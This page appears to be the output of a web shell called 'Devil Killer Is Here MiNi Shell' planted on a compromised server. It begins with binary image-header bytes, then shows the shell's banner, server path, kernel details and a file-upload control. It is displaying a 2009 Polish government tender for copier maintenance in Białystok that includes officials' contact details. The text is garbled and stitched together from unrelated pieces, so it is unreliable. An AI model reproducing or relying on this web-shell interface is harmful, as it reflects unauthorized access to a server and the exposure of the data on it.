JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/153988-N-2009.html

<p class="kh_header"><b>Białystok: Konserwacja i naprawa urządzeń kserograficznych  i wielofunkcyjnych w Podlaskim Urzędzie Wojewódzkim w Białymstoku i Placówkach Zamiejscowych w Łomży i Suwałkach</b><br>
<b>Numer ogłoszenia: 153988 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Urząd Wojewódzki w Białymstoku , ul. Adama Mickiewicza 3, 15-213 Białystok, woj. podlaskie, tel. 085 74-39-362, faks 085 7439320, 7439254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i naprawa urządzeń kserograficznych  i wielofunkcyjnych w Podlaskim Urzędzie Wojewódzkim w Białymstoku i Placówkach Zamiejscowych w Łomży i Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami:
1) Zadanie 1- konserwacja i naprawa kserokopiarek CANON;
2) Zadanie 2- konserwacja i naprawa kserokopiarek DEVELOP;
3) Zadanie 3- konserwacja i naprawa kserokopiarek XEROX;
4) Zadanie 4- konserwacja i naprawa kserokopiarek TOSHIBA;
5) Zadanie 5- konserwacja i naprawa kserokopiarek PANASONIC;
6) Zadanie 6- konserwacja i naprawa kserokopiarek MITA;
7) Zadanie 7- konserwacja i naprawa kserokopiarek NASHUATEC;
8) Zadanie 8- konserwacja i naprawa kserokopiarek KONICA;
9) Zadanie 9- konserwacja i naprawa urządzeń wielofunkcyjnych.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. 	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
2. 	Na potwierdzenie spełniania ww. warunków Zamawiający wymaga złożenia przez Wykonawców pisemnych oświadczeń i dokumentów.
3.	Warunki będą oceniane, na podstawie druku ZP-17 (spełnia/nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca składa następujące oświadczenia lub dokumenty:
1)	oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
2)	w celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy-aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
2.	W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. w formie konsorcjum, spółki cywilnej lub innego porozumienia regulującego ich współpracę w celu uzyskania zamówienia) należy załączyć dodatkowo pełnomocnictwo udzielone przez Wykonawców do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Oświadczenia lub dokumenty wymienione w SIWZ składane są przez Wykonawców wspólnie, z wyjątkiem wymienionych w ust. 1, które składane są dla każdego z Wykonawców oddzielnie. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawcy, przed zawarciem umowy w sprawie zamówienia publicznego przedstawią Zamawiającemu umowę regulującą ich współpracę.
3. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 2 składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
6. 	Wszystkie dokumenty muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bialystok.uw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział ds. Zamówień Publicznych Wydziału Organizacyjno-Administracyjnego Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50, tel. (085)7439293, faks: (085)7439254..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:00, miejsce: Sekretariat Wydziału Organizacyjno-Administracyjnego Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, 15 - 213 Białystok, pokój nr 49.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> OSOBY UPOWAŻNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI
w kwestiach formalnych - Pani Joanna Pietrzak inspektor w Oddziale ds. Zamówień Publicznych Wydziału Organizacyjno-Administracyjnego Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50, tel. (085) 74 39 293, faks: (085) 74 39 254,  w godz. 9.00 - 15.00, e-mail: jpietrzak@bialystok.uw.gov.pl
w kwestiach merytorycznych dotyczących przedmiotu zamówienia - Pan Tomasz Domitrz specjalista w  Zakładzie Obsługi Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 9, pokój nr 4 tel. (085) 74 39 339,  faks: (085) 73 24 202, w godz. 9.00 - 15.00, e-mail: tdomitrz@bialystok.uw.gov.pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1- konserwacja i naprawa kserokopiarek CANON.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 1- konserwacja i naprawa kserokopiarek CANON.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań. 
13. Oznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
     Przedmiot główny- 50313200- 4 usługi w zakresie konserwacji fotokopiarek.
     Przedmiot dodatkowy-50313100-3 usługi w zakresie naprawy fotokopiarek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2- konserwacja i naprawa kserokopiarek DEVELOP..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 2- konserwacja i naprawa kserokopiarek DEVELOP.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3- konserwacja i naprawa kserokopiarek XEROX..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami:Zadanie 3- konserwacja i naprawa kserokopiarek XEROX.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4- konserwacja i naprawa kserokopiarek TOSHIBA..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 4- konserwacja i naprawa kserokopiarek TOSHIBA.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
